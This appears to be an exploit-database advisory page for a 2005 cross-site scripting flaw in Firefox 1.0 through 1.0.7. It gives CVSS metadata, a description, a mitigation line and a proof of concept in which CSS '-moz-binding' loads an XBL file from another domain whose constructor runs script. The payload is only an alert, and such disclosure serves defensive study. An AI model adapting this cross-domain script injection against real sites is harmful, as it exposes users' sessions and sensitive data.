Mozilla Firefox Security Vulnerability

vendor:

Firefox

by:

SecurityFocus

7.5

CVSS

HIGH

Cross-site Scripting (XSS)

CWE

Product Name: Firefox

Affected Version From: Mozilla Firefox 1.0

Affected Version To: Mozilla Firefox 1.0.7

Patch Exists: YES

Related CWE: N/A

CPE: a:mozilla:firefox

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2005

Mozilla Firefox Security Vulnerability

Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain. The issue affects the '-moz-binding' property. This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information.

Mitigation:

Ensure that user-supplied input is properly validated and filtered before being used in the '-moz-binding' property.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16427/info

Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain.

The issue affects the '-moz-binding' property.


This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information. 

http://domain1/path/to/page.html :

<html>
<head>
<style>
body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>
</head>
<body>
</body>
</html>

http://domain2/path/to/xbl.xml :

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">

<binding id="xss">
<implementation>
<constructor>
alert("XBL XSS");
</constructor>
</implementation>
</binding>

</bindings>